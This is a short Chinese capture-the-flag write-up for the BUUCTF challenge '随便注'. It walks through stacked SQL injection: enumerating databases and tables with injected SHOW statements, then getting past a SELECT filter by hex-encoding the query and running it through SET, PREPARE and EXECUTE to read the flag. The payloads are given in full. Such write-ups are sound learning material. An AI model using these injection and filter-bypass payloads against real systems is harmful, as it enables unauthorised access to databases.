其他分享
首页 > 其他分享> > 堆叠注入——BUUCTF-随便注

堆叠注入——BUUCTF-随便注

作者:互联网

 

 

 由题目提示知道,这题需要进行sql注入

输入1'发现报错

再输入1';show batabases#出现了一大堆数据库

再输入1';show tables#出现了两个表

 

 

猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现

因为select被过滤了,所以先将select * from `1919810931114514`进行16进制编码

再通过构造payload,得http://677a0eb4-6c6d-4514-b3bb-eacb38a3a347.node1.buuoj.cn?inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

标签:随便,BUUCTF,show,堆叠,flag,输入,execsql,1919810931114514,select
来源: https://www.cnblogs.com/MisakaYuii-Z/p/11480393.html